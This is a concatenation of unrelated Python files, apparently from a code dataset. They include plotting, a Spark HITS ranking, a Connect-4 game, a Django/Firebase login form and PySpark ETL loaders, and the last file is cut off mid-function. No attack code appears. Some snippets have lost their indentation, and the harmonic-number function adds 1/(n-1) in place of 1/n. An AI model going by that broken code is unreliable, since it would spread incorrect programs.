    """Draw a grouped bar chart of spread of influence per algorithm for
    each budget on *network* and save it as a PDF.

    EpinionsFix reuses the NetPHYFix cost file.  Each CSV line is
    "<algorithm>,<v1>,<v2>,..." with one value per budget.  Returns early
    (with a message) when the cost file does not exist.
    """
    import os
    name = network
    if name == 'EpinionsFix':
        name = "NetPHYFix"
    if not os.path.exists('./Test/Cost-{}.csv'.format(name)):
        print(name, "COST 记录不存在")
        return
    record = {}
    xlenth = 0
    # Fixed: context manager so the CSV handle is always closed
    # (the original open() was never closed).
    with open('./Test/Cost-{}.csv'.format(name), 'r') as file:
        for line in file:
            arr = line.split(',')
            alg = arr.pop(0)
            sigmas = list(map(lambda x: float(x), arr))
            xlenth = len(sigmas)
            record[alg] = sigmas
    bar_width = 3
    x = np.array([i * bar_width * 6 for i in range(xlenth)])
    # Fixed color/hatch per algorithm so plots are consistent across figures.
    draw_config = {
        'MaxDegree': ['#9ABBF3', '/'],
        'StaticGreedy': ['#FFFFA2', 'x'],
        'CELF++': ['#C2B2D6', '.'],
        'TIM': ['#9BD59B', "\\"],
        'ICT': ['#FDC897', None]
    }
    plt.figure(figsize=(22,14))
    plt.grid(linestyle="--")  # dashed background grid
    ax = plt.gca()
    ax.yaxis.set_tick_params(which='major', size=10, width=2, direction='in', right='on')
    ax.yaxis.set_tick_params(which='minor', size=7, width=2, direction='in', right='on')
    idx = 0
    for alg in draw_config.keys():
        if alg not in record:
            continue
        plt.bar(x + idx * bar_width, record[alg], bar_width, label=alg, zorder=10, color=draw_config[alg][0], hatch=draw_config[alg][1], edgecolor='#000000')
        idx += 1
    plt.yticks(size=40)
    plt.xticks(x + bar_width * 5 / 2.5, budgets_config[network], size=40)
    ax.set_ylabel('Spread of influence', labelpad=5, size=48)
    ax.set_xlabel('Budget', labelpad=10, size=48)
    plt.legend(fontsize=40)
    # Fixed: raw string so the Windows path's backslashes are not escapes.
    plt.savefig(r'D:\latexProject\CSCWD\DrawMax\Cost-{}.pdf'.format(network), dpi=300, transparent=False, bbox_inches='tight')
if __name__ == "__main__":
    # Render the runtime chart, then the sigma and cost charts per network.
    draw_runtime()
    # draw_simulate_predict()
    for network in ('NetHEPTFix', 'NetPHYFix', 'EpinionsFix'):
        draw_sigma(network)
        draw_cost(network)
995,034 | c04edea687245f60bfcb8253ec3111455561f95d | import os
import sys
import time
import csv
import numpy as np
def time_to_slot(hh, mm):
    """Map a clock time to one of the 96 fifteen-minute slots of a day.

    Parameters
    ----------
    hh : hour (0-23)
    mm : minute (0-60; values above 60 are reported as invalid)

    Notes
    -----
    Slots are 1-based: 00:00-00:14 is slot 1, 23:45 onward is slot 96.
    """
    hour_slot = hh * 4
    if mm > 60:
        # Out-of-range minute: warn and contribute nothing to the slot.
        print("Minute value incorrect, please check it")
        minute_slot = 0
    elif mm >= 45:
        minute_slot = 4
    elif mm >= 30:
        minute_slot = 3
    elif mm >= 15:
        minute_slot = 2
    else:
        minute_slot = 1
    return hour_slot + minute_slot
if __name__ == '__main__':
    # Smoke test: 02:15 falls in slot 10.
    slot = time_to_slot(2, 15)
    print(slot)
|
995,035 | 0f0f06cb67cee46492b4835b11d95042e5eae240 | # -*- coding: utf-8 -*-
# @Author: Arius
# @Email: arius@qq.com
# @Date: 2019-01-26 23:55:45
|
995,036 | 1761a8e3c92f7f60101c23f61b6d4a42ffaf1ca1 | def harmonicNum(n):
if n == 1:
return 1
else:
return harmonicNum(n-1) + 1/(n-1)
if __name__ == "__main__":
    # Demo: print the value for n = 4.
    result = harmonicNum(4)
    print(result)
|
995,037 | 0308766a64e1e5d8e9ad1f79306ab25583b31433 | import torch
from torch.utils.data import Dataset, DataLoader
from model import *
from data_loaders import *
from get_embeddings import *
from constants import *
def main():
    """Load the preprocessed German data, then report the accuracy and run
    ID stored in the trained-model checkpoint and exit.

    NOTE: the vocabulary/MUSE-embedding loading and the validation-loader
    construction were left disabled in the original and are omitted here.
    """
    print("[INFO] -> Loading Preprocessed Data ...")
    german_data = torch.load("../data/data_de_" + DOMAIN + ".pt")
    print("[INFO] -> Done.")
    # Inspect the saved training checkpoint.
    checkpoint = torch.load(MODEL_PREFIX + MODEL_FILE)
    print(checkpoint["acc"])
    print(checkpoint["run_ID"])
    exit(0)
# Script entry point.
if __name__=="__main__":
    main()
995,038 | 8dc6728a707a00ad65f689ae31bf57d382ee019a | ## Code for HITS.py
## Calculates the hubbiness and authority of all nodes (uses 40 iterations)
import sys
import numpy as np
from pyspark import SparkConf, SparkContext
from pyspark.accumulators import AccumulatorParam
# Spark context over the edge-list file given as argv[1].
conf = SparkConf()
sc = SparkContext(conf=conf)
lines = sc.textFile(sys.argv[1])
# Each line is "src dst"; parse into de-duplicated integer edge pairs.
data = lines.map(lambda line: line.split())
edgeList = data.map(lambda l: (int(l[0]),int(l[1])))
edgeList = edgeList.distinct()
# n = number of distinct source nodes; node ids are assumed to be 1..n.
n = edgeList.map(lambda k: k[0]).distinct().count()
# h: hubbiness scores, a: authority scores (node id i -> index i-1).
h = np.ones(n)
a = np.zeros(n)
def update_a(edge, h, a_accum):
    """Fold one edge's contribution into the authority accumulator.

    The destination node edge[1] gains authority equal to the hubbiness of
    the source node edge[0] (node ids are 1-indexed).
    """
    src, dst = edge
    contribution = np.zeros(len(h))
    contribution[dst - 1] = h[src - 1]
    a_accum.add(contribution)
def update_h(edge, a, h_accum):
    """Fold one edge's contribution into the hubbiness accumulator.

    The source node edge[0] gains hubbiness equal to the authority of the
    destination node edge[1] (node ids are 1-indexed).

    Fixed: the vector length now comes from the ``a`` parameter instead of
    the driver-side global ``h``, so the closure no longer depends on a
    global when shipped to Spark executors.
    """
    update = np.zeros(len(a))
    update[edge[0] - 1] = a[edge[1] - 1]
    h_accum.add(update)
class VectorAccumulatorParam(AccumulatorParam):
    """Spark accumulator parameter that sums numpy vectors element-wise."""
    def zero(self, value):
        # Identity element: a zero vector with the same length as *value*.
        return np.zeros(len(value))
    def addInPlace(self, v1, v2):
        # Element-wise in-place sum; returning v1 is required by the API.
        v1 += v2
        return v1
# 40 HITS iterations: recompute authority from hubbiness, then hubbiness
# from authority, normalizing each vector by its maximum component.
for i in range(40):
    a_accum = sc.accumulator(a, VectorAccumulatorParam())
    edgeList.foreach(lambda edge: update_a(edge, h, a_accum))
    a = a_accum.value
    a = a / np.amax(a)
    h_accum = sc.accumulator(h, VectorAccumulatorParam())
    edgeList.foreach(lambda edge: update_h(edge, a, h_accum))
    h = h_accum.value
    h = h / np.amax(h)
# Report the 5 lowest and the highest scoring nodes (printed ids are 1-based).
# NOTE(review): the [990:] slice assumes exactly 1000 nodes -- TODO confirm.
asort = np.argsort(a)
# print(list(a))
print("a Worst: ", asort[:5]+1)
print("a Best: ", asort[990:]+1)
hsort = np.argsort(h)
# print(list(h))
print("h Worst: ", hsort[:5]+1)
print("h Best: ", hsort[990:]+1)
995,039 | 9a1ce1f7afad23aed2fa2bb0eb7c5ea8cbcf283e | numero = [0]*2
for i in range(2):
numero[i] = int(input('Digite o {}º número: '.format(i+1)))
if numero[0] > numero[1]:
print('O primeiro valor é maior!')
elif numero[0] < numero[1]:
print('O segundo valor é maior!')
elif numero[0] == numero[1]:
print('Os dois valores são iguais!')
|
995,040 | f9a36ab12d1fde95a2e77899a80e9f23aad21b0c |
### import
from quizzer.models.model import Model, MAX_LEN
from quizzer.models.teacher import Teacher
### Class
class Class(Model):
    """A school class (course section), optionally assigned a teacher."""

    FIELDS = dict(
        number=dict(types=unicode, length=(1, MAX_LEN)),
        name=dict(types=unicode, length=(1, MAX_LEN)),
        teacher=dict(types=Teacher, null=True, default=None),
    )

    ### find_students
    def find_students(self):
        """
        Find students attending this class in the current semester.
        @yield student: Student
        """
        from quizzer.models.attendance import Attendance
        from quizzer.models.semester import Semester

        current = Semester.get_current()
        # TODO: Use indexed query later.
        matching = (a for a in Attendance.objects
                    if a.semester == current and a.class_ == self)
        for attendance in matching:
            yield attendance.student
|
995,041 | 1831a6f36be5a572f650402982d26e9706e01635 | ## function to find area of rectangle
def area_rectangle(l, b):
    """Return the area of a rectangle with length *l* and breadth *b*."""
    area = l * b
    return area
|
995,042 | f224c5526d3d2ffeb7d8eea87f2cd6febb0bcd2a | import numpy as np
import os
import math
import pygame
from time import sleep
from Robots import Robots
from GamePlay import GamePlay
#class that creates the connect4 environment
class Connect4():
    '''Connect-4 game environment: wires a GamePlay board and a Robots AI
    helper together, and offers both a console front end (play) and a
    pygame front end (play_Graphics).'''
    def __init__(self,p1='HUMAN',p2='HUMAN',depth=3,spacing=100,controler=0):
        # p1/p2: 'HUMAN' or a bot name understood by Robots.ROBOT
        # depth: search depth for tree-search bots
        # spacing: pixel size of one board cell
        # controler: extra horizontal window space in pixels
        self.gameplay=GamePlay()
        self.bots = Robots()
        self.p1=p1
        self.p2=p2
        self.depth = depth
        self.bots.depth = self.depth
        # Mirror board geometry/state from the GamePlay instance.
        self.ROWS = self.gameplay.ROWS
        self.COLUMNS = self.gameplay.COLUMNS
        self.CONNECT = self.gameplay.CONNECT
        self.BOARD = self.gameplay.BOARD
        self.prev = self.gameplay.prev
        # pygame window geometry (one extra row on top for drop animation space)
        self.spacing = spacing
        self.controler = controler
        self.windowx=self.COLUMNS*self.spacing+self.controler
        self.windowy=(self.ROWS+1)*spacing
        # colors for the board
        # NOTE(review): BLUE's 225 looks like a typo for 255 -- confirm.
        self.BG_COLOR = (28, 170, 156)
        self.BLUE = (0,0,225)
        self.RED = (255, 0 ,50)
        self.YELLOW = (255,200,0)
        self.BLACK = (0, 0, 0)
        self.coffee_brown =((200,190,140))
        # cell value -> circle color (0 empty, 1 player one, 2 player two)
        self.color_dict={0:self.BLACK,1: self.RED,2: self.YELLOW}
    def load_model(self,name=None):
        # Load a saved model for the 'DNN' bot (Robots' default file when
        # name is None).
        if name==None:
            self.bots.load_model()
        else:
            self.bots.load_model(name)
    def Set_Depth(self,depth):
        # Keep the environment's and the bots' search depth in sync.
        self.depth = depth
        self.bots.depth = depth
    #display board!
    def Display_BOARD(self,turn,BOARD):
        # Console rendering: clear the screen, then show scores, whose turn
        # it is, the legal moves, and the grid row by row.
        # NOTE(review): 'cls' is Windows-only; 'clear' would be needed on
        # POSIX -- confirm target platform.
        os.system('cls')
        print('Play Connect 4!')
        print('Player 1 Score: {}. Player 2 Score: {}'.format(self.gameplay.Get_Score(1,BOARD),self.gameplay.Get_Score(2,BOARD)))
        print("Player {}'s turn!".format((turn % 2)+1))
        print('Legal Moves:')
        print(self.gameplay.Get_Legal_Moves(BOARD))
        print('')
        for row in BOARD:
            print(row)
    #Function to play the game in CMD
    def play(self):
        # Console game loop: alternate players until Check_Goal reports an
        # end state.  Invalid moves do not advance the turn counter.
        turn = 0
        status=self.gameplay.Check_Goal(self.gameplay.BOARD)
        self.Display_BOARD(turn,self.gameplay.BOARD)
        while status == 'Keep Playing!':
            actions = self.gameplay.Get_Legal_Moves(self.gameplay.BOARD)
            print('')
            if turn % 2 ==0:
                if self.p1 !='HUMAN': #if it's not a human do the robot moves
                    m = self.bots.ROBOT(1,self.p1,self.gameplay.BOARD)
                else:
                    m = input('Where would you like to go? ')
                try:
                    self.gameplay.Add_Piece(1,int(m),self.gameplay.BOARD)
                    turn +=1
                except:
                    print('Invalid Move')
            elif turn % 2 ==1:
                if self.p2 !='HUMAN':
                    m = self.bots.ROBOT(2,self.p2,self.gameplay.BOARD)
                else:
                    m = input('Where would you like to go? ')
                try:
                    self.gameplay.Add_Piece(2,int(m),self.gameplay.BOARD)
                    turn +=1
                except:
                    print('Invalid Move')
            self.Display_BOARD(turn,self.gameplay.BOARD)
            status=self.gameplay.Check_Goal(self.gameplay.BOARD)
        print(status)
    #helper functions
    def Draw_Section(self,x,y,width,item):
        # Draw one cell: a blue square with a circle in the cell's color.
        pygame.draw.rect(self.window,self.BLUE, [x,y,width,width])
        pygame.draw.circle(self.window, self.color_dict[item], (math.floor(x+width/2),
                            math.floor(y+width/2)), math.floor(width/2)-3)
    def Draw_Board(self):
        # Paint every cell; the board starts one cell-height below the top.
        for j,row in enumerate(self.gameplay.BOARD):
            for i,cell in enumerate(row):
                self.Draw_Section(self.spacing*i,self.spacing+self.spacing*j,self.spacing,cell)
    def Get_Col(self,x):
        # Map a pixel x coordinate to a board column index (None if x is
        # outside every column band, e.g. in the controler margin).
        floor=0
        ceiling = self.spacing
        for i in range(self.COLUMNS):
            if floor<x<ceiling:
                return i
            floor = floor + self.spacing
            ceiling = ceiling + self.spacing
    #play with pygame
    def play_Graphics(self):
        # pygame game loop: bots move automatically each frame; human moves
        # come from mouse clicks mapped to a column.
        self.window = pygame.display.set_mode((self.windowx,self.windowy))
        pygame.init()
        pygame.display.set_caption('Connect 4')
        self.window.fill(self.BG_COLOR)
        run = True
        turn = 0
        while run:
            status=self.gameplay.Check_Goal(self.gameplay.BOARD)
            actions = self.gameplay.Get_Legal_Moves(self.gameplay.BOARD)
            if turn % 2 ==0 and self.p1!='HUMAN' and status=='Keep Playing!':
                m = self.bots.ROBOT(1,self.p1,self.gameplay.BOARD)
                self.gameplay.Add_Piece(1,int(m),self.gameplay.BOARD)
                status=self.gameplay.Check_Goal(self.gameplay.BOARD)
                turn +=1
            if turn % 2 ==1 and self.p2!='HUMAN' and status=='Keep Playing!':
                m = self.bots.ROBOT(2,self.p2,self.gameplay.BOARD)
                self.gameplay.Add_Piece(2,int(m),self.gameplay.BOARD)
                turn +=1
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    run = False
                if event.type == pygame.MOUSEBUTTONDOWN:
                    mx, my = event.pos
                    if turn % 2 ==0 and self.p1 =='HUMAN':
                        m = self.Get_Col(mx)
                        try:
                            self.gameplay.Add_Piece(1,int(m),self.gameplay.BOARD)
                        except:
                            print('Invalid Move')
                    if turn % 2 ==1 and self.p2=='HUMAN':
                        m = self.Get_Col(mx)
                        try:
                            self.gameplay.Add_Piece(2,int(m),self.gameplay.BOARD)
                        except:
                            print('Invalid Move')
                    # NOTE(review): unlike play(), the turn counter advances
                    # on EVERY click -- even an invalid move -- so a human
                    # can lose a turn here; likely a bug, confirm intent.
                    turn +=1
            print('Player 1 Score: {}. Player 2 Score: {}'.format(self.gameplay.Get_Score(1,self.gameplay.BOARD),self.gameplay.Get_Score(2,self.gameplay.BOARD)))
            #self.gameplay.Display_BOARD(turn)
            status=self.gameplay.Check_Goal(self.gameplay.BOARD)
            self.Draw_Board()
            pygame.display.update()
            if status !='Keep Playing!':
                # Game over: show the result for 3 seconds, then exit the loop.
                print(status)
                sleep(3)
                run = False
#FmoveBot, Rando, MiniMax, AlphaBeta
# Entry point: human (player 1) vs. the alpha-beta search bot (player 2)
# at search depth 4, using the pygame front end.
if __name__=="__main__":
    game=Connect4()
    game.Set_Depth(4)
    game.p2='AlphaBeta'
    #game.p2='MiniMax'
    #game.load_model('mymodel_5000.h5')#'mymodel_30794.h5')
    #game.p1='DNN'
    #game.p2='Rando'
    #game.play()
    game.play_Graphics()
|
995,043 | 1104efbfcaa0cdb8fe4492fe85f96bcb6e444801 | from django import forms
from firesdk.firebase_functions.firebaseconn import CompanyId, encode_email, get_user
from firebase_admin import auth
class LoginForm(forms.Form):
    """Login form that validates the company code, the user's existence in
    that company, and the Firebase ID token.

    All failures raise the same generic message so the form does not leak
    which credential was wrong.
    """

    company_id = forms.CharField(max_length=50, required=True)
    email = forms.EmailField(max_length=254, required=True)
    password = forms.CharField(widget=forms.PasswordInput(), required=True)
    token = forms.CharField(widget=forms.HiddenInput())
    remember_code = forms.BooleanField(required=False)

    def clean(self):
        data = super().clean()
        # Resolve the company code to a company name.
        try:
            company_name = CompanyId.objects.get(
                company_code=data.get('company_id')).name
        except CompanyId.DoesNotExist:
            raise forms.ValidationError('Invalid Credentials')
        # The user must exist within that company.
        if not get_user(company_name, encode_email(data.get('email'))):
            raise forms.ValidationError('Invalid Credentials')
        # The Firebase ID token must verify.
        try:
            _ = auth.verify_id_token(data.get('token'))
        except ValueError:
            raise forms.ValidationError('Invalid Credentials')
        return self.cleaned_data
|
995,044 | b8d3a49312644059b6e688c627163c1fe6c8b1be | #!/usr/bin/env python
# coding: utf-8
# load_dims.py
# Author: Kevin Solano
from modulos.create_sparkSession import create_spark_session
from pyspark.sql.functions import *
from pyspark.sql import types as t
import configparser
def load_dim_job():
    """
    Load dim_job (job title/category dimension) into the presentation layer.

    Full load rebuilds the dimension from staging; delta load appends only
    rows whose (job_title, job_category) pair is not already present.
    """
    config = configparser.ConfigParser()
    config.read('/home/jovyan/work/tfm-jobs-main/parameters.cfg')
    loadType = config.get('PARAM', 'LOADTYPE')
    spark = create_spark_session()
    # Read source rows from the staging layer.
    df_stg_jobposts = spark.read.parquet(config['AWS']['S3_BUCKET']+"/staging/job_posts")
    if loadType=="full":
        #DIM JOB POST
        # Build the dimension: distinct title/category pairs with a uuid key.
        df_dim = df_stg_jobposts.select("job_title", "job_category1").distinct() \
                    .withColumn("job_key", expr("uuid()")) \
                    .withColumnRenamed("job_category1", "job_category") \
                    .withColumn("created_date", current_date()) \
                    .select("job_key", "job_title", "job_category", "created_date")
        df_dim.show(5)
        # Overwrite the presentation-layer dimension.
        df_dim.repartition(2).write.parquet(config['AWS']['S3_BUCKET'] + "/presentation/dim_job", mode="overwrite")
    else:
        # Current dimension contents.
        df_act_dim = spark.read.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_job")
        # Candidate rows from staging.
        df_dim = df_stg_jobposts.select("job_title", "job_category1").distinct() \
                    .withColumnRenamed("job_category1", "job_category") \
                    .withColumn("created_date", current_date()) \
                    .select("job_title", "job_category", "created_date")
        # Delta: staging rows not yet in the dimension (left anti-join).
        df_delta_dim = df_dim.join(df_act_dim, [df_dim["job_title"] == df_act_dim["job_title"],
                                   df_dim["job_category"] == df_act_dim["job_category"]],"leftanti") \
                    .withColumn("job_key", expr("uuid()")) \
                    .select("job_key", "job_title", "job_category", "created_date")
        df_new_dim = df_act_dim.union(df_delta_dim)
        # Stage through /tmp, then rewrite presentation (presumably to avoid
        # overwriting the path being read -- confirm).
        df_new_dim.write.parquet(config['AWS']['S3_BUCKET'] + "/tmp/dim_job", mode="overwrite")
        spark.read.parquet(config['AWS']['S3_BUCKET']+ "/tmp/dim_job") \
            .repartition(2).write.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_job", mode="overwrite")
def load_dim_city():
    """
    Load dim_city (city/country dimension) into the presentation layer.

    Full load rebuilds it from staging; delta load appends unseen cities.
    The country column is hard-coded to "EGIPTO".
    """
    config = configparser.ConfigParser()
    config.read('/home/jovyan/work/tfm-jobs-main/parameters.cfg')
    loadType = config.get('PARAM', 'LOADTYPE')
    spark = create_spark_session()
    # Read source rows from the staging layer.
    df_stg_jobposts = spark.read.parquet(config['AWS']['S3_BUCKET']+"/staging/job_posts")
    if loadType=="full":
        #DIM CITY
        # Build the dimension: distinct cities with a uuid surrogate key.
        df_dim = df_stg_jobposts.select("city").distinct() \
                    .withColumn("city_key", expr("uuid()")) \
                    .withColumn("country", lit("EGIPTO")) \
                    .withColumn("created_date", current_date()) \
                    .select("city_key", "city", "country","created_date")
        df_dim.show(5)
        # Overwrite the presentation-layer dimension.
        df_dim.repartition(2).write.parquet(config['AWS']['S3_BUCKET'] + "/presentation/dim_city", mode="overwrite")
    else:
        # Current dimension contents.
        df_act_dim = spark.read.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_city")
        # Candidate rows from staging.
        df_dim = df_stg_jobposts.select("city").distinct() \
                    .withColumn("country", lit("EGIPTO")) \
                    .withColumn("created_date", current_date()) \
                    .select("city", "country", "created_date")
        # Delta: staging cities not yet in the dimension (left anti-join).
        df_delta_dim = df_dim.join(df_act_dim, df_dim["city"] == df_act_dim["city"],"leftanti") \
                    .withColumn("city_key", expr("uuid()")) \
                    .select("city_key", "city", "country", "created_date")
        df_new_dim = df_act_dim.union(df_delta_dim)
        # Stage through /tmp, then rewrite presentation (presumably to avoid
        # overwriting the path being read -- confirm).
        df_new_dim.write.parquet(config['AWS']['S3_BUCKET'] + "/tmp/dim_city", mode="overwrite")
        spark.read.parquet(config['AWS']['S3_BUCKET']+ "/tmp/dim_city") \
            .repartition(2).write.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_city", mode="overwrite")
def load_dim_industry():
    """
    Load dim_industry (job industry dimension) into the presentation layer.

    Full load rebuilds it from staging; delta load appends unseen industries.
    """
    config = configparser.ConfigParser()
    config.read('/home/jovyan/work/tfm-jobs-main/parameters.cfg')
    loadType = config.get('PARAM', 'LOADTYPE')
    spark = create_spark_session()
    # Read source rows from the staging layer.
    df_stg_jobposts = spark.read.parquet(config['AWS']['S3_BUCKET']+"/staging/job_posts")
    if loadType=="full":
        # Build the dimension: distinct industries with a uuid surrogate key.
        df_dim = df_stg_jobposts.select("job_industry1").distinct() \
                    .withColumn("industry_key", expr("uuid()")) \
                    .withColumnRenamed("job_industry1", "job_industry") \
                    .withColumn("created_date", current_date()) \
                    .select("industry_key", "job_industry", "created_date")
        df_dim.show(5)
        # Overwrite the presentation-layer dimension.
        df_dim.repartition(2).write.parquet(config['AWS']['S3_BUCKET'] + "/presentation/dim_industry", mode="overwrite")
    else:
        # Current dimension contents.
        df_act_dim = spark.read.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_industry")
        # Candidate rows from staging.
        df_dim = df_stg_jobposts.select("job_industry1").distinct() \
                    .withColumnRenamed("job_industry1", "job_industry") \
                    .withColumn("created_date", current_date()) \
                    .select("job_industry", "created_date")
        # Delta: staging industries not yet in the dimension (left anti-join).
        df_delta_dim = df_dim.join(df_act_dim, df_dim["job_industry"] == df_act_dim["job_industry"],"leftanti") \
                    .withColumn("industry_key", expr("uuid()")) \
                    .select("industry_key", "job_industry", "created_date")
        df_new_dim = df_act_dim.union(df_delta_dim)
        # Stage through /tmp, then rewrite presentation (presumably to avoid
        # overwriting the path being read -- confirm).
        df_new_dim.write.parquet(config['AWS']['S3_BUCKET'] + "/tmp/dim_industry", mode="overwrite")
        spark.read.parquet(config['AWS']['S3_BUCKET']+ "/tmp/dim_industry") \
            .repartition(2).write.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_industry", mode="overwrite")
def load_dim_career_level():
    """
    Load dim_career_level (career level dimension) into the presentation layer.

    Full load rebuilds it from staging; delta load appends unseen levels.
    """
    config = configparser.ConfigParser()
    config.read('/home/jovyan/work/tfm-jobs-main/parameters.cfg')
    loadType = config.get('PARAM', 'LOADTYPE')
    spark = create_spark_session()
    # Read source rows from the staging layer.
    df_stg_jobposts = spark.read.parquet(config['AWS']['S3_BUCKET']+"/staging/job_posts")
    if loadType=="full":
        # Build the dimension: distinct levels with a uuid surrogate key.
        df_dim = df_stg_jobposts.select("career_level").distinct() \
                    .withColumn("career_level_key", expr("uuid()")) \
                    .withColumn("created_date", current_date()) \
                    .select("career_level_key", "career_level", "created_date")
        df_dim.show(5)
        # Overwrite the presentation-layer dimension.
        df_dim.repartition(2).write.parquet(config['AWS']['S3_BUCKET'] + "/presentation/dim_career_level", mode="overwrite")
    else:
        # Current dimension contents.
        df_act_dim = spark.read.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_career_level")
        # Candidate rows from staging.
        df_dim = df_stg_jobposts.select("career_level").distinct() \
                    .withColumn("created_date", current_date()) \
                    .select("career_level", "created_date")
        # Delta: staging levels not yet in the dimension (left anti-join).
        df_delta_dim = df_dim.join(df_act_dim, df_dim["career_level"] == df_act_dim["career_level"],"leftanti") \
                    .withColumn("career_level_key", expr("uuid()")) \
                    .select("career_level_key", "career_level", "created_date")
        df_new_dim = df_act_dim.union(df_delta_dim)
        # Stage through /tmp, then rewrite presentation (presumably to avoid
        # overwriting the path being read -- confirm).
        df_new_dim.write.parquet(config['AWS']['S3_BUCKET'] + "/tmp/dim_career_level", mode="overwrite")
        spark.read.parquet(config['AWS']['S3_BUCKET']+ "/tmp/dim_career_level") \
            .repartition(2).write.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_career_level", mode="overwrite")
def load_dim_job_requirements():
    """
    Load dim_job_requirements (requirements text per job post) into the
    presentation layer.

    Full load rebuilds it from staging; delta load appends rows for job ids
    not already present.
    """
    config = configparser.ConfigParser()
    config.read('/home/jovyan/work/tfm-jobs-main/parameters.cfg')
    loadType = config.get('PARAM', 'LOADTYPE')
    spark = create_spark_session()
    # Read source rows from the staging layer.
    df_stg_jobposts = spark.read.parquet(config['AWS']['S3_BUCKET']+"/staging/job_posts")
    if loadType=="full":
        #dim_job_requirements
        # Build the dimension: one row per (job id, requirements) with a uuid key.
        df_dim = df_stg_jobposts.select("id", "job_requirements").distinct() \
                    .withColumn("job_requirements_key", expr("uuid()")) \
                    .withColumnRenamed("id", "job_id") \
                    .withColumn("created_date", current_date()) \
                    .select("job_requirements_key", "job_id", "job_requirements", "created_date")
        df_dim.show(5)
        # Overwrite the presentation-layer dimension.
        df_dim.repartition(2).write.parquet(config['AWS']['S3_BUCKET'] + "/presentation/dim_job_requirements", mode="overwrite")
    else:
        # Current dimension contents.
        df_act_dim = spark.read.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_job_requirements")
        # Candidate rows from staging.
        df_dim = df_stg_jobposts.select("id", "job_requirements").distinct() \
                    .withColumnRenamed("id", "job_id") \
                    .withColumn("created_date", current_date()) \
                    .select("job_id", "job_requirements", "created_date")
        # Delta: job ids not yet in the dimension (left anti-join).
        df_delta_dim = df_dim.join(df_act_dim, df_dim["job_id"] == df_act_dim["job_id"],"leftanti") \
                    .withColumn("job_requirements_key", expr("uuid()")) \
                    .select("job_requirements_key", "job_id", "job_requirements", "created_date")
        df_new_dim = df_act_dim.union(df_delta_dim)
        # Stage through /tmp, then rewrite presentation (presumably to avoid
        # overwriting the path being read -- confirm).
        df_new_dim.write.parquet(config['AWS']['S3_BUCKET'] + "/tmp/dim_job_requirements", mode="overwrite")
        spark.read.parquet(config['AWS']['S3_BUCKET']+ "/tmp/dim_job_requirements") \
            .repartition(2).write.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_job_requirements", mode="overwrite")
def load_dim_job_payment():
    """
    Load dim_job_payment (payment period/currency/salary range dimension)
    into the presentation layer.

    Full load rebuilds it from staging and adds a "-1" default member for
    unknown payments; delta load appends unseen combinations.
    """
    config = configparser.ConfigParser()
    config.read('/home/jovyan/work/tfm-jobs-main/parameters.cfg')
    loadType = config.get('PARAM', 'LOADTYPE')
    spark = create_spark_session()
    # Read source rows from the staging layer.
    df_stg_jobposts = spark.read.parquet(config['AWS']['S3_BUCKET']+"/staging/job_posts")
    if loadType=="full":
        #DIM JOB PAYMENT
        # Build the dimension: distinct payment combos with a uuid key, plus
        # the "-1" default row.
        df_dim = df_stg_jobposts.select("payment_period", "currency", "salary_minimum", "salary_maximum").distinct() \
                    .withColumn("job_payment_key", expr("uuid()")) \
                    .select("job_payment_key", "payment_period", "currency", "salary_minimum", "salary_maximum")\
                    .union(spark.createDataFrame([("-1","-","-", 0, 0)],
                            ["job_payment_key", "payment_period", "currency", "salary_minimum", "salary_maximum"]))\
                    .withColumn("created_date", current_date())
        df_dim.show(5)
        # Overwrite the presentation-layer dimension.
        df_dim.repartition(2).write.parquet(config['AWS']['S3_BUCKET'] + "/presentation/dim_job_payment", mode="overwrite")
    else:
        # Current dimension contents.
        df_act_dim = spark.read.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_job_payment")
        # Candidate rows from staging.
        df_dim = df_stg_jobposts.select("payment_period", "currency", "salary_minimum", "salary_maximum").distinct() \
                    .withColumn("created_date", current_date()) \
                    .select("payment_period", "currency", "salary_minimum", "salary_maximum", "created_date")
        # Delta: payment combos not yet in the dimension (left anti-join on
        # all four natural-key columns).
        df_delta_dim = df_dim.join(df_act_dim, [df_dim["payment_period"] == df_act_dim["payment_period"],
                                   df_dim["currency"] == df_act_dim["currency"],
                                   df_dim["salary_minimum"] == df_act_dim["salary_minimum"],
                                   df_dim["salary_maximum"] == df_act_dim["salary_maximum"]],"leftanti") \
                    .withColumn("job_payment_key", expr("uuid()")) \
                    .select("job_payment_key", "payment_period", "currency", "salary_minimum", "salary_maximum", "created_date")
        df_new_dim = df_act_dim.union(df_delta_dim)
        # Stage through /tmp, then rewrite presentation (presumably to avoid
        # overwriting the path being read -- confirm).
        df_new_dim.write.parquet(config['AWS']['S3_BUCKET'] + "/tmp/dim_job_payment", mode="overwrite")
        spark.read.parquet(config['AWS']['S3_BUCKET']+ "/tmp/dim_job_payment") \
            .repartition(2).write.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_job_payment", mode="overwrite")
def load_dim_experience_years():
    """
    Load dim_experience_years into the presentation layer.

    Derives min_experience_years by extracting the first 1-2 digit number
    from the free-text experience_years field.  Full load rebuilds the
    dimension; delta load appends unseen values.
    """
    config = configparser.ConfigParser()
    config.read('/home/jovyan/work/tfm-jobs-main/parameters.cfg')
    loadType = config.get('PARAM', 'LOADTYPE')
    spark = create_spark_session()
    # Read source rows from the staging layer.
    df_stg_jobposts = spark.read.parquet(config['AWS']['S3_BUCKET']+"/staging/job_posts")
    if loadType=="full":
        #DIM JOB POST
        # Build the dimension: distinct experience strings with a uuid key and
        # the extracted minimum years (first 1-2 digit group in the text).
        df_dim = df_stg_jobposts.select("experience_years").distinct() \
                    .withColumn("experience_years_key", expr("uuid()")) \
                    .withColumn("created_date", current_date()) \
                    .withColumn("min_experience_years", regexp_extract("experience_years", "(\\d{1,2})" , 1 ))\
                    .select("experience_years_key", "min_experience_years", "experience_years", "created_date")
        df_dim = df_dim.withColumn("min_experience_years", df_dim["min_experience_years"].cast(t.IntegerType()))
        df_dim.show(5)
        # Overwrite the presentation-layer dimension.
